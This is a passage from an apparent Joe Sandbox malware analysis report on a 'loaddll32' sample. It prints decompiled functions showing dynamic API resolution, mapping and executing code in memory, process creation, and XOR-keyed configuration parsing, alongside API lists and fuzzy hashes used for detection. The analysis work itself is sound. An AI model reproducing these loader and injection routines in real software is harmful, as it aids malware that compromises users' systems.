						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}
























                                          0x005f15cb
                                          0x005f15d1
                                          0x005f15d6
                                          0x005f15db
                                          0x005f16dc
                                          0x005f16e1
                                          0x005f16e1
                                          0x005f15e2
                                          0x005f15e5
                                          0x005f15e8
                                          0x005f15ed
                                          0x005f16db
                                          0x00000000
                                          0x005f16db
                                          0x005f15f4
                                          0x005f15f4
                                          0x005f15f8
                                          0x005f15fe
                                          0x005f1603
                                          0x00000000
                                          0x00000000
                                          0x005f1609
                                          0x005f1618
                                          0x005f161d
                                          0x005f161f
                                          0x005f1622
                                          0x005f1627
                                          0x005f1633
                                          0x005f1633
                                          0x005f1636
                                          0x005f163a
                                          0x005f16c0
                                          0x005f16c0
                                          0x005f16c3
                                          0x005f16c6
                                          0x005f16cb
                                          0x00000000
                                          0x00000000
                                          0x005f16da
                                          0x00000000
                                          0x005f16da
                                          0x005f1644
                                          0x005f1647
                                          0x00000000
                                          0x005f1649
                                          0x005f1649
                                          0x005f1652
                                          0x005f1667
                                          0x005f1669
                                          0x005f1660
                                          0x005f1660
                                          0x005f1660
                                          0x005f164b
                                          0x005f164b
                                          0x005f164b
                                          0x005f166c
                                          0x005f166c
                                          0x005f1671
                                          0x005f1673
                                          0x005f1673
                                          0x005f167b
                                          0x005f1681
                                          0x005f1686
                                          0x00000000
                                          0x00000000
                                          0x005f168a
                                          0x005f168c
                                          0x005f169a
                                          0x005f169f
                                          0x005f169f
                                          0x005f16a8
                                          0x005f16ab
                                          0x005f16ae
                                          0x005f16b2
                                          0x00000000
                                          0x005f16b4
                                          0x005f16bd
                                          0x005f16bd
                                          0x00000000
                                          0x005f16bd
                                          0x005f16b6
                                          0x005f16b6
                                          0x00000000
                                          0x005f16b6
                                          0x005f1629
                                          0x005f162d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f162d
                                          0x005f16d3
                                          0x00000000

                                          APIs
                                          • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000002), ref: 005F15F8
                                          • lstrlenA.KERNEL32(?), ref: 005F160E
                                          • memset.NTDLL ref: 005F1618
                                          • GetProcAddress.KERNEL32(?,00000002), ref: 005F167B
                                          • lstrlenA.KERNEL32(-00000002), ref: 005F1690
                                          • memset.NTDLL ref: 005F169A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemset$AddressLibraryLoadProc
                                          • String ID: ~
                                          • API String ID: 1986585659-1707062198
                                          • Opcode ID: bb13d4875ef30258dbb3ac02228cceee63db88b8f15d865a11d8bb1d6f67da50
                                          • Instruction ID: c7493781c4a674ff50d00c56e75bfb916c2123d10dbabac9801fefd9e41c6531
                                          • Opcode Fuzzy Hash: bb13d4875ef30258dbb3ac02228cceee63db88b8f15d865a11d8bb1d6f67da50
                                          • Instruction Fuzzy Hash: FF31B8B5A00A1AEBDB14CF15C854BBDBBB8BF54344F14412DEE05DB640DB38EA05CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C71493, Relevance: 12.1, APIs: 8, Instructions: 110librarymemoryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E00C71493(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E00C757D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0xc7d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0xc7d2a4; // 0x24ba5a8
					_t18 = _t46 + 0xc7e3e6; // 0x73797325
					_t66 = E00C777E6(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0xc7d2a4; // 0x24ba5a8
						_t19 = _t49 + 0xc7e747; // 0x3138cef
						_t20 = _t49 + 0xc7e0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00C7684E();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00C7684E();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xc7d238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E00C7147E(_t68);
				goto L12;
			}



















                                          0x00c7149b
                                          0x00c7149b
                                          0x00c714aa
                                          0x00c714b1
                                          0x00c714b6
                                          0x00c715c6
                                          0x00c715cd
                                          0x00c715cd
                                          0x00c714c5
                                          0x00c714d0
                                          0x00c714d3
                                          0x00c714d8
                                          0x00c714ed
                                          0x00c714f3
                                          0x00c714f4
                                          0x00c714f7
                                          0x00c714fd
                                          0x00c71500
                                          0x00c71505
                                          0x00c7150d
                                          0x00c71519
                                          0x00c7151d
                                          0x00c715ad
                                          0x00c71523
                                          0x00c71523
                                          0x00c71528
                                          0x00c7152f
                                          0x00c71543
                                          0x00c71547
                                          0x00c71596
                                          0x00c71549
                                          0x00c7154a
                                          0x00c71551
                                          0x00c7156a
                                          0x00c7156c
                                          0x00c71570
                                          0x00c71577
                                          0x00c71591
                                          0x00c71579
                                          0x00c71582
                                          0x00c71587
                                          0x00c71587
                                          0x00c71577
                                          0x00c715a5
                                          0x00c715a5
                                          0x00c7151d
                                          0x00c715b4
                                          0x00c715bd
                                          0x00c715c1
                                          0x00000000

                                          APIs
                                            • Part of subcall function 00C757D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00C714AF,?,?,?,?,00000000,00000000), ref: 00C757FD
                                            • Part of subcall function 00C757D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00C7581F
                                            • Part of subcall function 00C757D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00C75835
                                            • Part of subcall function 00C757D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00C7584B
                                            • Part of subcall function 00C757D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00C75861
                                            • Part of subcall function 00C757D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00C75877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 00C714C5
                                          • memset.NTDLL ref: 00C71500
                                            • Part of subcall function 00C777E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,00C7333A,73797325), ref: 00C777F7
                                            • Part of subcall function 00C777E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00C77811
                                          • GetModuleHandleA.KERNEL32(4E52454B,03138CEF,73797325), ref: 00C71536
                                          • GetProcAddress.KERNEL32(00000000), ref: 00C7153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C715A5
                                            • Part of subcall function 00C7684E: GetProcAddress.KERNEL32(36776F57,00C7935F), ref: 00C76869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 00C71582
                                          • CloseHandle.KERNEL32(?), ref: 00C71587
                                          • GetLastError.KERNEL32(00000001), ref: 00C7158B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: b9eb45ade125c7a2396a87f706d3ae69673e953fb2d5b19258bd086f252eca44
                                          • Instruction ID: f688c1878c315d970cf0d8b66911c92439e02c8557914926903e6f46716d973b
                                          • Opcode Fuzzy Hash: b9eb45ade125c7a2396a87f706d3ae69673e953fb2d5b19258bd086f252eca44
                                          • Instruction Fuzzy Hash: 7E3132B2800209EFDB21AFA4DC89E9EBBBCEF48344F144565F61AA7121D7319E44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C74D2C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E00C74D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xc7d2a4; // 0x24ba5a8
				_t1 = _t9 + 0xc7e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00C76027(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00C758BE(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00C76F33(_t34, _t41, _a8);
						E00C7147E(_t41);
						_t42 = E00C74759(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00C7147E(_t36);
							_t36 = _t42;
						}
						_t43 = E00C74858(_t36, _t33);
						if(_t43 != 0) {
							E00C7147E(_t36);
							_t36 = _t43;
						}
					}
					E00C7147E(_t28);
				}
				return _t36;
			}














                                          0x00c74d2c
                                          0x00c74d2f
                                          0x00c74d30
                                          0x00c74d38
                                          0x00c74d3f
                                          0x00c74d46
                                          0x00c74d4a
                                          0x00c74d50
                                          0x00c74d57
                                          0x00c74d5c
                                          0x00c74d6e
                                          0x00c74d72
                                          0x00c74d76
                                          0x00c74d7c
                                          0x00c74d81
                                          0x00c74d91
                                          0x00c74d93
                                          0x00c74daa
                                          0x00c74dae
                                          0x00c74db1
                                          0x00c74db6
                                          0x00c74db6
                                          0x00c74dbf
                                          0x00c74dc3
                                          0x00c74dc6
                                          0x00c74dcb
                                          0x00c74dcb
                                          0x00c74dc3
                                          0x00c74dce
                                          0x00c74dce
                                          0x00c74dd9

                                          APIs
                                            • Part of subcall function 00C76027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,00C74D46,253D7325,00000000,00000000,74ECC740,?,?,00C752FE,?), ref: 00C7608E
                                            • Part of subcall function 00C76027: sprintf.NTDLL ref: 00C760AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C752FE,?,031395B0), ref: 00C74D57
                                          • lstrlen.KERNEL32(?,?,?,00C752FE,?,031395B0), ref: 00C74D5F
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • strcpy.NTDLL ref: 00C74D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 00C74D81
                                            • Part of subcall function 00C76F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00C74D90,00000000,?,?,?,00C752FE,?,031395B0), ref: 00C76F4A
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C752FE,?,031395B0), ref: 00C74D9E
                                            • Part of subcall function 00C74759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00C74DAA,00000000,?,?,00C752FE,?,031395B0), ref: 00C74763
                                            • Part of subcall function 00C74759: _snprintf.NTDLL ref: 00C747C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: f916a663e21137f3dfb4151af87e15af0633df782274d855938b1d33f836c213
                                          • Instruction ID: 8bc80ee78a5e5a788e36d547b76db45f5e4d2c07f55cc5bf78de131649953d90
                                          • Opcode Fuzzy Hash: f916a663e21137f3dfb4151af87e15af0633df782274d855938b1d33f836c213
                                          • Instruction Fuzzy Hash: AF11C673A015296B472277F89C85D6F3AAD9F457603058119F91CBB112CF74DD01A7E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C798F7, Relevance: 9.2, APIs: 6, Instructions: 187memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00C798F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				signed int _t18;
				signed int _t23;
				void* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t41;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				signed int _t58;
				signed int _t62;
				signed int _t66;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t80 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0xc7d2a0; // 0x59935a40
				if(E00C796D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0xc7d2d0 = _v12;
				}
				_t23 =  *0xc7d2a0; // 0x59935a40
				if(E00C796D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_t28 = 2;
					return _t28;
				} else {
					_push(_t69);
					_t70 = _v12;
					_push(_t83);
					_push(_t80);
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t66 =  *0xc7d2a0; // 0x59935a40
						_t29 = E00C710CA(_t72, _t70, _t66 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0xc7d240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t62 =  *0xc7d2a0; // 0x59935a40
						_t30 = E00C710CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0xc7d244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t58 =  *0xc7d2a0; // 0x59935a40
						_t31 = E00C710CA(_t72, _t70, _t58 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xc7d248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t54 =  *0xc7d2a0; // 0x59935a40
						_t32 = E00C710CA(_t72, _t70, _t54 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xc7d004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t50 =  *0xc7d2a0; // 0x59935a40
						_t33 = E00C710CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xc7d02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t46 =  *0xc7d2a0; // 0x59935a40
						_t34 = E00C710CA(_t72, _t70, _t46 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t43 = 0x10;
						_t44 = E00C7A2EF(_t43);
						if(_t44 != 0) {
							_push(_t44);
							E00C79B10();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t41 =  *0xc7d2a0; // 0x59935a40
						_t35 = E00C710CA(_t72, _t70, _t41 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E00C7A2EF(0, _t35) != 0) {
						_t86 =  *0xc7d324; // 0x31395b0
						E00C74C3A(_t86 + 4, _t39);
					}
					HeapFree( *0xc7d238, 0, _t70);
					return 0;
				}
			}





























                                          0x00c798f7
                                          0x00c798f7
                                          0x00c798f7
                                          0x00c798f7
                                          0x00c798fa
                                          0x00c798fb
                                          0x00c798fc
                                          0x00c79916
                                          0x00c79924
                                          0x00c79924
                                          0x00c79929
                                          0x00c79943
                                          0x00c79ad2
                                          0x00c79ad4
                                          0x00c79949
                                          0x00c79949
                                          0x00c7994a
                                          0x00c7994d
                                          0x00c7994e
                                          0x00c79953
                                          0x00c79969
                                          0x00c79955
                                          0x00c79955
                                          0x00c79962
                                          0x00c79962
                                          0x00c79973
                                          0x00c79975
                                          0x00c7997f
                                          0x00c79984
                                          0x00c79984
                                          0x00c7997f
                                          0x00c7998b
                                          0x00c799a1
                                          0x00c7998d
                                          0x00c7998d
                                          0x00c7999a
                                          0x00c7999a
                                          0x00c799a5
                                          0x00c799a7
                                          0x00c799b1
                                          0x00c799b6
                                          0x00c799b6
                                          0x00c799b1
                                          0x00c799bd
                                          0x00c799d3
                                          0x00c799bf
                                          0x00c799bf
                                          0x00c799cc
                                          0x00c799cc
                                          0x00c799d7
                                          0x00c799d9
                                          0x00c799e3
                                          0x00c799e8
                                          0x00c799e8
                                          0x00c799e3
                                          0x00c799ef
                                          0x00c79a05
                                          0x00c799f1
                                          0x00c799f1
                                          0x00c799fe
                                          0x00c799fe
                                          0x00c79a09
                                          0x00c79a0b
                                          0x00c79a15
                                          0x00c79a1a
                                          0x00c79a1a
                                          0x00c79a15
                                          0x00c79a21
                                          0x00c79a37
                                          0x00c79a23
                                          0x00c79a23
                                          0x00c79a30
                                          0x00c79a30
                                          0x00c79a3b
                                          0x00c79a3d
                                          0x00c79a47
                                          0x00c79a4c
                                          0x00c79a4c
                                          0x00c79a47
                                          0x00c79a53
                                          0x00c79a69
                                          0x00c79a55
                                          0x00c79a55
                                          0x00c79a62
                                          0x00c79a62
                                          0x00c79a6d
                                          0x00c79a6f
                                          0x00c79a72
                                          0x00c79a73
                                          0x00c79a7a
                                          0x00c79a7c
                                          0x00c79a7d
                                          0x00c79a7d
                                          0x00c79a7a
                                          0x00c79a84
                                          0x00c79a9a
                                          0x00c79a86
                                          0x00c79a86
                                          0x00c79a93
                                          0x00c79a93
                                          0x00c79a9e
                                          0x00c79aac
                                          0x00c79ab6
                                          0x00c79ab6
                                          0x00c79ac3
                                          0x00c79acf
                                          0x00c79acf

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C7997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C799AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C799DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C79A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C79A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C79AC3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 07d03052a59555eb6cbc0c9d05f124f81597dd43dacda13f8906a712f070c175
                                          • Instruction ID: 6adb4d81749d9e3b996b0f44668c94cfe7ab98a8ade936f92bcc2aa1e2cb51cd
                                          • Opcode Fuzzy Hash: 07d03052a59555eb6cbc0c9d05f124f81597dd43dacda13f8906a712f070c175
                                          • Instruction Fuzzy Hash: 4151A571B00104EED710EBB9DD89E5F76FDEB88710B688959B90EE7105EA31DE81E720
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7135B, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 00C713B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 00C713C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 00C713DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C71443
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C71452
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C7145D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 6f732946ce78e8d399304e7cf1cdad5eaa5ecf40bfd74b26c44e4f14d9f71e17
                                          • Instruction ID: fd8fda4386df6cfb019f7eb0501f5ac0cf2eee58ae7db57c0031278f8da38db6
                                          • Opcode Fuzzy Hash: 6f732946ce78e8d399304e7cf1cdad5eaa5ecf40bfd74b26c44e4f14d9f71e17
                                          • Instruction Fuzzy Hash: A2414036900609AFDB01EFFCD845A9EB7BAEF49301F148465ED18EB120DA71DE45CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C757D8, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00C757D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00C758BE(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xc7d2a4; // 0x24ba5a8
					_t1 = _t23 + 0xc7e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xc7d2a4; // 0x24ba5a8
					_t2 = _t26 + 0xc7e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00C7147E(_t54);
					} else {
						_t30 =  *0xc7d2a4; // 0x24ba5a8
						_t5 = _t30 + 0xc7e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xc7d2a4; // 0x24ba5a8
							_t7 = _t33 + 0xc7e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xc7d2a4; // 0x24ba5a8
								_t9 = _t36 + 0xc7e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xc7d2a4; // 0x24ba5a8
									_t11 = _t39 + 0xc7e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00C77B01(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                          0x00c757e7
                                          0x00c757eb
                                          0x00c758ad
                                          0x00c757f1
                                          0x00c757f1
                                          0x00c757f6
                                          0x00c75809
                                          0x00c7580b
                                          0x00c75810
                                          0x00c75818
                                          0x00c7581f
                                          0x00c75821
                                          0x00c75826
                                          0x00c758a5
                                          0x00c758a6
                                          0x00c75828
                                          0x00c75828
                                          0x00c7582d
                                          0x00c75835
                                          0x00c75837
                                          0x00c7583c
                                          0x00000000
                                          0x00c7583e
                                          0x00c7583e
                                          0x00c75843
                                          0x00c7584b
                                          0x00c7584d
                                          0x00c75852
                                          0x00000000
                                          0x00c75854
                                          0x00c75854
                                          0x00c75859
                                          0x00c75861
                                          0x00c75863
                                          0x00c75868
                                          0x00000000
                                          0x00c7586a
                                          0x00c7586a
                                          0x00c7586f
                                          0x00c75877
                                          0x00c75879
                                          0x00c7587e
                                          0x00000000
                                          0x00c75880
                                          0x00c75886
                                          0x00c7588b
                                          0x00c75892
                                          0x00c75897
                                          0x00c7589c
                                          0x00000000
                                          0x00c7589e
                                          0x00c758a1
                                          0x00c758a1
                                          0x00c7589c
                                          0x00c7587e
                                          0x00c75868
                                          0x00c75852
                                          0x00c7583c
                                          0x00c75826
                                          0x00c758bb

                                          APIs
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00C714AF,?,?,?,?,00000000,00000000), ref: 00C757FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00C7581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00C75835
